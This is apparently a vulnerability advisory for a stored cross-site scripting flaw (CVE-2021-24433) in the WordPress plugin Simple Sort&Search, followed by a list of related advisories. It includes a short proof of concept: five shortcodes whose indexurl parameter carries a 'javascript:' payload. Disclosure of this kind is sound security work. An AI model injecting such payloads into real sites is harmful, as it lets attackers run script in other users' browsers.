Simple Sort&Search <= 0.0.3 – Ccontributor+ Stored XSS | CVE 2021-24433 | Plugin Vulnerabilities

Description

The plugin does not make sure that the indexurl parameter of the shortcodes "category_sims", "order_sims", "orderby_sims", "period_sims", and "tag_sims" use allowed URL protocols, which can lead to stored cross-site scripting by users with a role as low as Contributor

Proof of Concept

As a contributor, add one of the shortcode below to a post or page, then view it and change the state of the input/s generated (such as tick a checkbox, or select a different option etc) to trigger the XSS

[category_sims type="checkbox" indexurl="javascript:alert(origin)//"]
[order_sims indexurl="javascript:alert(origin)//"]
[orderby_sims indexurl="javascript:alert(origin)//"]
[period_sims indexurl="javascript:alert(origin)//"]
[tag_sims type="checkbox" indexurl="javascript:alert(origin)//"]

Affects Plugins

simple-sortsearch

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Submitter

apple502j

Verified

Yes

WPVDB ID

2ce8c786-ba82-427c-b5e7-e3b300a24c5f

Timeline

Publicly Published

2021-06-21 (about 4 years ago)

Added

2021-06-21 (about 4 years ago)

Last Updated

2021-06-25 (about 4 years ago)

Other

Published

Title

Published

2025-01-16

Title

Flexible Blogtitle <= 0.1 - Reflected Cross-Site Scripting

Published

2024-12-11

Title

Smart Agenda – Prise de rendez-vous en ligne < 4.7 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-11-29

Title

Automatic Youtube Video Posts Plugin <= 5.2.2 - Authenticated (Administrator+) Stored Cross-Site Scripting via settings

Published

2021-12-27

Title

Image Hover Effects Ultimate < 9.7.1 - Reflected Cross-Site Scripting

Published

2021-12-03

Title

Modern Events Calendar Lite < 6.2.0 - Subscriber+ Category Add Leading to Stored XSS